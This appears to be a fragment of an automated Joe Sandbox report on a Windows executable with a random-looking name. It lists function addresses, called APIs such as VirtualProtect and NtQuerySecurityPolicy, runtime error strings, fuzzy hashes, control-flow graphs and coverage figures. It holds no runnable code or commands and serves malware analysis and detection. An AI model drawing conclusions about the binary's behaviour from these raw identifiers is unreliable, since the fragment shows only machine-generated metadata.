7ff7b9e81394 2 API calls 3648->3649 3650 7ff7b9e8148b 3649->3650 3651 7ff7b9e81394 2 API calls 3650->3651 3652 7ff7b9e8149a 3651->3652 3653 7ff7b9e81394 2 API calls 3652->3653 3654 7ff7b9e814a9 3653->3654 3655 7ff7b9e81394 2 API calls 3654->3655 3656 7ff7b9e814b8 3655->3656 3657 7ff7b9e81394 2 API calls 3656->3657 3658 7ff7b9e814c7 3657->3658 3659 7ff7b9e81394 2 API calls 3658->3659 3660 7ff7b9e814d6 3659->3660 3661 7ff7b9e81394 2 API calls 3660->3661 3662 7ff7b9e814e5 3661->3662 3663 7ff7b9e81394 2 API calls 3662->3663 3664 7ff7b9e814f4 3663->3664 3665 7ff7b9e81394 2 API calls 3664->3665 3666 7ff7b9e81503 3665->3666 3667 7ff7b9e81512 3666->3667 3668 7ff7b9e81394 2 API calls 3666->3668 3669 7ff7b9e81394 2 API calls 3667->3669 3668->3667 3670 7ff7b9e81521 3669->3670 3671 7ff7b9e81394 2 API calls 3670->3671 3672 7ff7b9e8152b 3671->3672 3673 7ff7b9e81394 2 API calls 3672->3673 3674 7ff7b9e81530 3673->3674 3675 7ff7b9e81394 2 API calls 3674->3675 3676 7ff7b9e8153f 3675->3676 3677 7ff7b9e81394 2 API calls 3676->3677 3678 7ff7b9e8154e 3677->3678 3679 7ff7b9e81394 2 API calls 3678->3679 3680 7ff7b9e8155d 3679->3680 3681 7ff7b9e81394 2 API calls 3680->3681 3682 7ff7b9e8156c 3681->3682 3683 7ff7b9e81394 2 API calls 3682->3683 3684 7ff7b9e8157b 3683->3684 3685 7ff7b9e81394 2 API calls 3684->3685 3686 7ff7b9e8158a 3685->3686 3687 7ff7b9e81394 2 API calls 3686->3687 3688 7ff7b9e81599 3687->3688 3689 7ff7b9e81394 2 API calls 3688->3689 3690 7ff7b9e815a8 3689->3690 3691 7ff7b9e81394 2 API calls 3690->3691 3692 7ff7b9e815b7 3691->3692 3693 7ff7b9e81394 2 API calls 3692->3693 3694 7ff7b9e815c6 3693->3694 3695 7ff7b9e81394 2 API calls 3694->3695 3696 7ff7b9e815d5 3695->3696 3697 7ff7b9e81394 2 API calls 3696->3697 3698 7ff7b9e815e4 3697->3698 3699 7ff7b9e81394 2 API calls 3698->3699 3700 7ff7b9e815f3 3699->3700 3700->3199 3702 7ff7b9e81394 2 API calls 3701->3702 3703 7ff7b9e815d5 3702->3703 3704 7ff7b9e81394 2 API calls 3703->3704 3705 7ff7b9e815e4 3704->3705 3706 7ff7b9e81394 2 API calls 3705->3706 3707 7ff7b9e815f3 3706->3707 3707->3200 3726 7ff7b9e81000 3727 7ff7b9e8108b __set_app_type 3726->3727 3728 7ff7b9e81040 3726->3728 3729 7ff7b9e810b6 3727->3729 3728->3727 3730 7ff7b9e810e5 3729->3730 3732 7ff7b9e81e00 3729->3732 3733 7ff7b9e888b0 __setusermatherr 3732->3733 3734 7ff7b9e81800 3735 7ff7b9e81812 3734->3735 3736 7ff7b9e81835 fprintf 3735->3736 3811 7ff7b9e82320 strlen 3812 7ff7b9e82337 3811->3812

                                                                  Executed Functions

                                                                  Function 00007FF7B9E81160 Relevance: 13.6, APIs: 9, Instructions: 130sleepstringCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000017.00000002.1832094015.00007FF7B9E81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7B9E80000, based on PE: true
                                                                  • Associated: 00000017.00000002.1832066410.00007FF7B9E80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000017.00000002.1832122970.00007FF7B9E89000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000017.00000002.1832153702.00007FF7B9E8B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000017.00000002.1832456624.00007FF7BA10A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000017.00000002.1832496642.00007FF7BA10D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_23_2_7ff7b9e80000_kgpcbqezuufy.jbxd
                                                                  Similarity
                                                                  • API ID: malloc$ExceptionFilterSleepUnhandled_amsg_exit_cexit_inittermmemcpystrlen
                                                                  • String ID:
                                                                  • API String ID: 2643109117-0
                                                                  • Opcode ID: 7dc0e20ee06a047c58c8969f60c7aa9bc1c695feb4ea1f1336e2537d86a415e6
                                                                  • Instruction ID: 43b679c6e2c5fea81ba0842aff91cf32def790b2e3f4234c4ff907f48e5a9fef
                                                                  • Opcode Fuzzy Hash: 7dc0e20ee06a047c58c8969f60c7aa9bc1c695feb4ea1f1336e2537d86a415e6
                                                                  • Instruction Fuzzy Hash: 04511132D1968685F651BF9DE9D8279F3B1AF66780F908131DF2D47399DE2CA4418320
                                                                  Function 00007FF7B9E81394 Relevance: 1.5, APIs: 1, Instructions: 24nativeCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • NtQuerySecurityPolicy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7B9E81156), ref: 00007FF7B9E813F7
                                                                  Memory Dump Source
                                                                  • Source File: 00000017.00000002.1832094015.00007FF7B9E81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7B9E80000, based on PE: true
                                                                  • Associated: 00000017.00000002.1832066410.00007FF7B9E80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000017.00000002.1832122970.00007FF7B9E89000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000017.00000002.1832153702.00007FF7B9E8B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000017.00000002.1832456624.00007FF7BA10A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000017.00000002.1832496642.00007FF7BA10D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_23_2_7ff7b9e80000_kgpcbqezuufy.jbxd
                                                                  Similarity
                                                                  • API ID: PolicyQuerySecurity
                                                                  • String ID:
                                                                  • API String ID: 1045350227-0
                                                                  • Opcode ID: 856890430328471108b496156552b481e7f8763a777f6ca6df0782f1e0c8bf26
                                                                  • Instruction ID: 1d006f7d40dbb2170babc4b605331b74fab6a8af53618dd3417b20dac663e4e1
                                                                  • Opcode Fuzzy Hash: 856890430328471108b496156552b481e7f8763a777f6ca6df0782f1e0c8bf26
                                                                  • Instruction Fuzzy Hash: 9CF0FB32918B82C1D614EFA6F8D402AF371FB66340B444435EAAC02729DF3CD0508B50

                                                                  Non-executed Functions

                                                                  Function 00007FF7B9E82690 Relevance: 21.3, APIs: 8, Strings: 4, Instructions: 322COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000017.00000002.1832094015.00007FF7B9E81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7B9E80000, based on PE: true
                                                                  • Associated: 00000017.00000002.1832066410.00007FF7B9E80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000017.00000002.1832122970.00007FF7B9E89000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000017.00000002.1832153702.00007FF7B9E8B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000017.00000002.1832456624.00007FF7BA10A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000017.00000002.1832496642.00007FF7BA10D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_23_2_7ff7b9e80000_kgpcbqezuufy.jbxd
                                                                  Similarity
                                                                  • API ID: wcslen$memsetwcscatwcscpywcsncmp
                                                                  • String ID: 0$Cj$$X$`
                                                                  • API String ID: 329590056-3100607097
                                                                  • Opcode ID: b8983a0e767351e41f8a2dd7f3a744f191a8cf509c30d2e12db373b54b78512d
                                                                  • Instruction ID: b050647696afef926b4d9a715977dfb4282b03e168ee31d3688e8b3720907131
                                                                  • Opcode Fuzzy Hash: b8983a0e767351e41f8a2dd7f3a744f191a8cf509c30d2e12db373b54b78512d
                                                                  • Instruction Fuzzy Hash: D7028F22918BC581F360AF69E8843AAF7A0FB96794F904235DBAC077A9DF3CD145C710
                                                                  Function 00007FF7B9E83350 Relevance: 21.2, APIs: 9, Strings: 5, Instructions: 206COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000017.00000002.1832094015.00007FF7B9E81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7B9E80000, based on PE: true
                                                                  • Associated: 00000017.00000002.1832066410.00007FF7B9E80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000017.00000002.1832122970.00007FF7B9E89000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000017.00000002.1832153702.00007FF7B9E8B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000017.00000002.1832456624.00007FF7BA10A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000017.00000002.1832496642.00007FF7BA10D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_23_2_7ff7b9e80000_kgpcbqezuufy.jbxd
                                                                  Similarity
                                                                  • API ID: memset$wcscatwcscpywcslen
                                                                  • String ID: $0$0$@$@
                                                                  • API String ID: 4263182637-1413854666
                                                                  • Opcode ID: 70e93ec6abdd1a4cc0d18cd6ed6ff85189439c08585699d39736934ea620586d
                                                                  • Instruction ID: 02a3c9120e221cd643b38c30999a9d228df5638b6e4c34464379bda2508b693e
                                                                  • Opcode Fuzzy Hash: 70e93ec6abdd1a4cc0d18cd6ed6ff85189439c08585699d39736934ea620586d
                                                                  • Instruction Fuzzy Hash: CAB1AE2291CAC585F361AF68F4893ABF7B0FBA2344F901135EB88466A9DF7DD145CB10
                                                                  Function 00007FF7B9E81BA0 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 106memoryCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • VirtualQuery.KERNEL32(?,?,?,?,00007FF7B9E8A4DC,00007FF7B9E8A4DC,?,?,00007FF7B9E80000,?,00007FF7B9E81991), ref: 00007FF7B9E81C63
                                                                  • VirtualProtect.KERNEL32(?,?,?,?,00007FF7B9E8A4DC,00007FF7B9E8A4DC,?,?,00007FF7B9E80000,?,00007FF7B9E81991), ref: 00007FF7B9E81CC7
                                                                  • memcpy.MSVCRT ref: 00007FF7B9E81CE0
                                                                  • GetLastError.KERNEL32(?,?,?,?,00007FF7B9E8A4DC,00007FF7B9E8A4DC,?,?,00007FF7B9E80000,?,00007FF7B9E81991), ref: 00007FF7B9E81D23
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000017.00000002.1832094015.00007FF7B9E81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7B9E80000, based on PE: true
                                                                  • Associated: 00000017.00000002.1832066410.00007FF7B9E80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000017.00000002.1832122970.00007FF7B9E89000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000017.00000002.1832153702.00007FF7B9E8B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000017.00000002.1832456624.00007FF7BA10A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000017.00000002.1832496642.00007FF7BA10D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_23_2_7ff7b9e80000_kgpcbqezuufy.jbxd
                                                                  Similarity
                                                                  • API ID: Virtual$ErrorLastProtectQuerymemcpy
                                                                  • String ID: VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$Address %p has no image-section
                                                                  • API String ID: 2595394609-2123141913
                                                                  • Opcode ID: 60cf6631d5d8fe02d76019b25bf8b166b3865f8fdb2b66b6f59c16a09724d6a7
                                                                  • Instruction ID: 8e2ed838cec8b79eaa545eccb224a29c91c5706ab4e410f893cea13869b3331f
                                                                  • Opcode Fuzzy Hash: 60cf6631d5d8fe02d76019b25bf8b166b3865f8fdb2b66b6f59c16a09724d6a7
                                                                  • Instruction Fuzzy Hash: 19418662A0898685FA55BF89D4CC6B8F7B0EB66B80F958135DF1D43399DE3CE541C320
                                                                  Function 00007FF7B9E82104 Relevance: 9.1, APIs: 6, Instructions: 51COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000017.00000002.1832094015.00007FF7B9E81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7B9E80000, based on PE: true
                                                                  • Associated: 00000017.00000002.1832066410.00007FF7B9E80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000017.00000002.1832122970.00007FF7B9E89000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000017.00000002.1832153702.00007FF7B9E8B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000017.00000002.1832456624.00007FF7BA10A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000017.00000002.1832496642.00007FF7BA10D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_23_2_7ff7b9e80000_kgpcbqezuufy.jbxd
                                                                  Similarity
                                                                  • API ID: CriticalSection$DeleteEnterErrorLastLeaveValuefree
                                                                  • String ID:
                                                                  • API String ID: 3326252324-0
                                                                  • Opcode ID: 277a831d8e060c36ae463728c8f60050fbb842899c4e9a066aa8a6c99444941f
                                                                  • Instruction ID: 814024a721cf0f92dd9015abebc40a153c3a33dba64aa98fe2c4657971a7c49b
                                                                  • Opcode Fuzzy Hash: 277a831d8e060c36ae463728c8f60050fbb842899c4e9a066aa8a6c99444941f
                                                                  • Instruction Fuzzy Hash: FC210122E0D98681FA55BF89A5C8234F271BF26B81FD54570CF2D47768DF7DA8468230
                                                                  Function 00007FF7B9E88320 Relevance: 7.7, APIs: 1, Strings: 4, Instructions: 185COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 640 7ff7b9e88320-7ff7b9e8833c 641 7ff7b9e8836b-7ff7b9e8838f call 7ff7b9e88310 640->641 642 7ff7b9e8833e 640->642 647 7ff7b9e885b6-7ff7b9e885c8 641->647 649 7ff7b9e88395-7ff7b9e883a9 call 7ff7b9e88310 641->649 644 7ff7b9e88345-7ff7b9e8834a 642->644 645 7ff7b9e88350-7ff7b9e88353 644->645 645->647 648 7ff7b9e88359-7ff7b9e8835f 645->648 648->645 650 7ff7b9e88361-7ff7b9e88366 648->650 653 7ff7b9e883bf-7ff7b9e883d1 649->653 650->647 654 7ff7b9e883b3-7ff7b9e883bd 653->654 655 7ff7b9e883d3-7ff7b9e883ed call 7ff7b9e88310 653->655 654->653 656 7ff7b9e88415-7ff7b9e88418 654->656 661 7ff7b9e883ef-7ff7b9e88411 call 7ff7b9e88310 * 2 655->661 662 7ff7b9e883b0 655->662 656->647 658 7ff7b9e8841e-7ff7b9e8844a call 7ff7b9e88310 malloc 656->658 666 7ff7b9e88450-7ff7b9e88452 658->666 667 7ff7b9e885ac 658->667 661->654 672 7ff7b9e88413 661->672 662->654 666->667 669 7ff7b9e88458-7ff7b9e88488 call 7ff7b9e88310 * 2 666->669 667->647 676 7ff7b9e88490-7ff7b9e884a7 669->676 672->658 677 7ff7b9e88583-7ff7b9e8858b 676->677 678 7ff7b9e884ad-7ff7b9e884b3 676->678 681 7ff7b9e88596-7ff7b9e885a4 677->681 682 7ff7b9e8858d-7ff7b9e88590 677->682 679 7ff7b9e88502 678->679 680 7ff7b9e884b5-7ff7b9e884d3 call 7ff7b9e88310 678->680 685 7ff7b9e88507-7ff7b9e88549 call 7ff7b9e88310 * 2 679->685 688 7ff7b9e884e0-7ff7b9e884fe 680->688 681->644 684 7ff7b9e885aa 681->684 682->676 682->681 684->647 693 7ff7b9e88578-7ff7b9e8857f 685->693 694 7ff7b9e8854b 685->694 688->688 690 7ff7b9e88500 688->690 690->685 693->677 695 7ff7b9e88550-7ff7b9e8855c 694->695 696 7ff7b9e88573 695->696 697 7ff7b9e8855e-7ff7b9e88571 695->697 696->693 697->695 697->696
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000017.00000002.1832094015.00007FF7B9E81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7B9E80000, based on PE: true
                                                                  • Associated: 00000017.00000002.1832066410.00007FF7B9E80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000017.00000002.1832122970.00007FF7B9E89000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000017.00000002.1832153702.00007FF7B9E8B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000017.00000002.1832456624.00007FF7BA10A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000017.00000002.1832496642.00007FF7BA10D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_23_2_7ff7b9e80000_kgpcbqezuufy.jbxd
                                                                  Similarity
                                                                  • API ID: malloc
                                                                  • String ID: =$$Cj$$i$$i$
                                                                  • API String ID: 2803490479-1879266049
                                                                  • Opcode ID: a12c45f0e63f0545611badf4b31fa90aab6001f018c5534414d701305adcf2b0
                                                                  • Instruction ID: 40dfd093b9e23d49176ba14a5e8ce57387095e25e2cf16aea7493583e5acdc59
                                                                  • Opcode Fuzzy Hash: a12c45f0e63f0545611badf4b31fa90aab6001f018c5534414d701305adcf2b0
                                                                  • Instruction Fuzzy Hash: F571F527A285918BD754BF9894D463AF6B1FB69B48F844134EF7E43389DE38E840C760
                                                                  Function 00007FF7B9E81E10 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 77COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 730 7ff7b9e81e10-7ff7b9e81e2d 731 7ff7b9e81e3e-7ff7b9e81e48 730->731 732 7ff7b9e81e2f-7ff7b9e81e38 730->732 734 7ff7b9e81e4a-7ff7b9e81e53 731->734 735 7ff7b9e81ea3-7ff7b9e81ea8 731->735 732->731 733 7ff7b9e81f60-7ff7b9e81f69 732->733 736 7ff7b9e81ecc-7ff7b9e81ed1 734->736 737 7ff7b9e81e55-7ff7b9e81e60 734->737 735->733 738 7ff7b9e81eae-7ff7b9e81eb3 735->738 739 7ff7b9e81f23-7ff7b9e81f2d 736->739 740 7ff7b9e81ed3-7ff7b9e81ee2 signal 736->740 737->735 741 7ff7b9e81efb-7ff7b9e81f0a call 7ff7b9e888c0 738->741 742 7ff7b9e81eb5-7ff7b9e81eba 738->742 745 7ff7b9e81f43-7ff7b9e81f45 739->745 746 7ff7b9e81f2f-7ff7b9e81f3f 739->746 740->739 743 7ff7b9e81ee4-7ff7b9e81ee8 740->743 741->739 751 7ff7b9e81f0c-7ff7b9e81f10 741->751 742->733 747 7ff7b9e81ec0 742->747 748 7ff7b9e81f4e-7ff7b9e81f53 743->748 749 7ff7b9e81eea-7ff7b9e81ef9 signal 743->749 745->733 746->745 747->739 752 7ff7b9e81f5a 748->752 749->733 753 7ff7b9e81f55 751->753 754 7ff7b9e81f12-7ff7b9e81f21 signal 751->754 752->733 753->752 754->733
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000017.00000002.1832094015.00007FF7B9E81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7B9E80000, based on PE: true
                                                                  • Associated: 00000017.00000002.1832066410.00007FF7B9E80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000017.00000002.1832122970.00007FF7B9E89000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000017.00000002.1832153702.00007FF7B9E8B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000017.00000002.1832456624.00007FF7BA10A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000017.00000002.1832496642.00007FF7BA10D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_23_2_7ff7b9e80000_kgpcbqezuufy.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: CCG
                                                                  • API String ID: 0-1584390748
                                                                  • Opcode ID: dcece1a9a345dc98801b2edf6f2fa389c4cd27cf161fb8fe92b3b520b557ff1a
                                                                  • Instruction ID: 9dd2876aa0cdab94742cae3921b8c66e1756fcf53776e4803c0f410e1ce9a975
                                                                  • Opcode Fuzzy Hash: dcece1a9a345dc98801b2edf6f2fa389c4cd27cf161fb8fe92b3b520b557ff1a
                                                                  • Instruction Fuzzy Hash: 30216223E0C18645FA757A9C95C8379D162AFA67A4FA4C131EF3D432DDDE2CB8C18261
                                                                  Function 00007FF7B9E81880 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 138memoryCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 755 7ff7b9e81880-7ff7b9e8189c 756 7ff7b9e818a2-7ff7b9e818f9 call 7ff7b9e82420 call 7ff7b9e82660 755->756 757 7ff7b9e81a0f-7ff7b9e81a1f 755->757 756->757 762 7ff7b9e818ff-7ff7b9e81910 756->762 763 7ff7b9e8193e-7ff7b9e81941 762->763 764 7ff7b9e81912-7ff7b9e8191c 762->764 766 7ff7b9e8194d-7ff7b9e81954 763->766 767 7ff7b9e81943-7ff7b9e81947 763->767 765 7ff7b9e8191e-7ff7b9e81929 764->765 764->766 765->766 768 7ff7b9e8192b-7ff7b9e8193a 765->768 770 7ff7b9e8199e-7ff7b9e819a6 766->770 771 7ff7b9e81956-7ff7b9e81961 766->771 767->766 769 7ff7b9e81a20-7ff7b9e81a26 767->769 768->763 772 7ff7b9e81a2c-7ff7b9e81a37 769->772 773 7ff7b9e81b87-7ff7b9e81b98 call 7ff7b9e81d40 769->773 770->757 775 7ff7b9e819a8-7ff7b9e819c1 770->775 774 7ff7b9e81970-7ff7b9e8199c call 7ff7b9e81ba0 771->774 772->770 777 7ff7b9e81a3d-7ff7b9e81a5f 772->777 774->770 779 7ff7b9e819df-7ff7b9e819e7 775->779 783 7ff7b9e81a7d-7ff7b9e81a97 777->783 781 7ff7b9e819e9-7ff7b9e81a0d VirtualProtect 779->781 782 7ff7b9e819d0-7ff7b9e819dd 779->782 781->782 782->757 782->779 785 7ff7b9e81a9d-7ff7b9e81afa 783->785 786 7ff7b9e81b74-7ff7b9e81b82 call 7ff7b9e81d40 783->786 791 7ff7b9e81afc-7ff7b9e81b0e 785->791 792 7ff7b9e81b22-7ff7b9e81b26 785->792 786->773 793 7ff7b9e81b5c-7ff7b9e81b6f call 7ff7b9e81d40 791->793 794 7ff7b9e81b10-7ff7b9e81b20 791->794 795 7ff7b9e81b2c-7ff7b9e81b30 792->795 796 7ff7b9e81a70-7ff7b9e81a77 792->796 793->786 794->792 794->793 795->796 797 7ff7b9e81b36-7ff7b9e81b53 call 7ff7b9e81ba0 795->797 796->770 796->783 801 7ff7b9e81b57 797->801 801->801
                                                                  APIs
                                                                  • VirtualProtect.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7B9E81247), ref: 00007FF7B9E819F9
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000017.00000002.1832094015.00007FF7B9E81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7B9E80000, based on PE: true
                                                                  • Associated: 00000017.00000002.1832066410.00007FF7B9E80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000017.00000002.1832122970.00007FF7B9E89000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000017.00000002.1832153702.00007FF7B9E8B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000017.00000002.1832456624.00007FF7BA10A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000017.00000002.1832496642.00007FF7BA10D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_23_2_7ff7b9e80000_kgpcbqezuufy.jbxd
                                                                  Similarity
                                                                  • API ID: ProtectVirtual
                                                                  • String ID: Unknown pseudo relocation bit size %d.$ Unknown pseudo relocation protocol version %d.
                                                                  • API String ID: 544645111-395989641
                                                                  • Opcode ID: 287094a85b2253c4f613aac48dc49c5c0556f702c10d22a5b68489503c3bbe79
                                                                  • Instruction ID: 1c9ec08cc3bff795f1bd53886a71b10e0a9efc0da840967d0b0fe5a918bea03d
                                                                  • Opcode Fuzzy Hash: 287094a85b2253c4f613aac48dc49c5c0556f702c10d22a5b68489503c3bbe79
                                                                  • Instruction Fuzzy Hash: CA514023E08586D6EB10AF99E8C87A4F771AB26794F948171DA2C0779DCA3CE581C720
                                                                  Function 00007FF7B9E81800 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 30COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 802 7ff7b9e81800-7ff7b9e81810 803 7ff7b9e81824 802->803 804 7ff7b9e81812-7ff7b9e81822 802->804 805 7ff7b9e8182b-7ff7b9e81867 call 7ff7b9e82290 fprintf 803->805 804->805
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000017.00000002.1832094015.00007FF7B9E81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7B9E80000, based on PE: true
                                                                  • Associated: 00000017.00000002.1832066410.00007FF7B9E80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000017.00000002.1832122970.00007FF7B9E89000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000017.00000002.1832153702.00007FF7B9E8B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000017.00000002.1832456624.00007FF7BA10A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000017.00000002.1832496642.00007FF7BA10D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_23_2_7ff7b9e80000_kgpcbqezuufy.jbxd
                                                                  Similarity
                                                                  • API ID: fprintf
                                                                  • String ID: Unknown error$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                                  • API String ID: 383729395-3474627141
                                                                  • Opcode ID: 237c5e502358bb01a7dc05c2455ca96dc5b88e708203c1fe0ae604449a937fb0
                                                                  • Instruction ID: 14a8e4f1b1ec25760aad3ea15bcde6141838af5c9226f3c58977c3f7d27d8a9b
                                                                  • Opcode Fuzzy Hash: 237c5e502358bb01a7dc05c2455ca96dc5b88e708203c1fe0ae604449a937fb0
                                                                  • Instruction Fuzzy Hash: 82F0A412E1C98582E610BFA8A9C90B9E371EB6A3C0F819231EF5D5325ADF1CE1428310
                                                                  Function 00007FF7B9E8219E Relevance: 5.0, APIs: 4, Instructions: 34COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000017.00000002.1832094015.00007FF7B9E81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7B9E80000, based on PE: true
                                                                  • Associated: 00000017.00000002.1832066410.00007FF7B9E80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000017.00000002.1832122970.00007FF7B9E89000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000017.00000002.1832153702.00007FF7B9E8B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000017.00000002.1832456624.00007FF7BA10A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000017.00000002.1832496642.00007FF7BA10D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_23_2_7ff7b9e80000_kgpcbqezuufy.jbxd
                                                                  Similarity
                                                                  • API ID: CriticalSection$EnterErrorLastLeaveValue
                                                                  • String ID:
                                                                  • API String ID: 682475483-0
                                                                  • Opcode ID: 2933b585481871f5a4bb6ffdf32d253fb7c79dcb43ada2d5c520729cfe6986fd
                                                                  • Instruction ID: d15ade8a9a16aa53e77419b0faa3e39f787c6cf13e0f489a26ff96204b616198
                                                                  • Opcode Fuzzy Hash: 2933b585481871f5a4bb6ffdf32d253fb7c79dcb43ada2d5c520729cfe6986fd
                                                                  • Instruction Fuzzy Hash: D9010027A0D98281FA55BF89A9C8134F2B0AB26BD1FD54171CF2D4375CDF3CA8568230

                                                                  Execution Graph

                                                                  Execution Coverage:2.4%
                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                  Signature Coverage:0%
                                                                  Total number of Nodes:851
